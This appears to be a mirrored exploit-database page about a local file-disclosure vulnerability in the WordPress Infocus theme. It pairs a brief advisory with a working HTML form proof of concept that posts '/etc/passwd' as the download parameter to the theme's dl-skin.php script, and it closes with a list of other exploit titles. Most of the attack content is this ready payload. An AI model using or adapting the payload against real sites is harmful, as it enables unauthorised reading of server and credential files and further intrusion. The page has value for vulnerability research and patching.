WordPress Theme Infocus – ‘/infocus/lib/scripts/dl-skin.php’ Local File Disclosure

Exploit Database
21 阅读

作者： Felipe Andrian Peixoto

日期： 2014-06-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39211/

source: https://www.securityfocus.com/bid/67934/info

The Infocus theme for WordPress is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.

Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. 

<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>

last Exploits
WordPress Theme Infocus – ‘/infocus/lib/scripts/dl-skin.php’ Local File Disclosure的更多信息

SJS Simple Job Script – SQL Injection / Cross-Site Scripting：
Yahoo User Interface library (YUI2) TreeView v2.8.2 – Multiple Reflected Cross Site Scripting (XSS)：
TRENDnet TEW-634GRU 1.00.23 – Multiple Vulnerabilities：
ManageEngine Network Configuration Manager 12.2 – ‘apiKey’ SQL Injection：
Netartmedia Real Estate Portal 5.0 – SQL Injection：
ICDental Clinic 1.2 – ‘key’ SQL Injection：
LogRhythm Network Monitor – Authentication Bypass / Command Injection：
Etano 1.20/1.22 – ‘photo_view.php?return’ Cross-Site Scripting：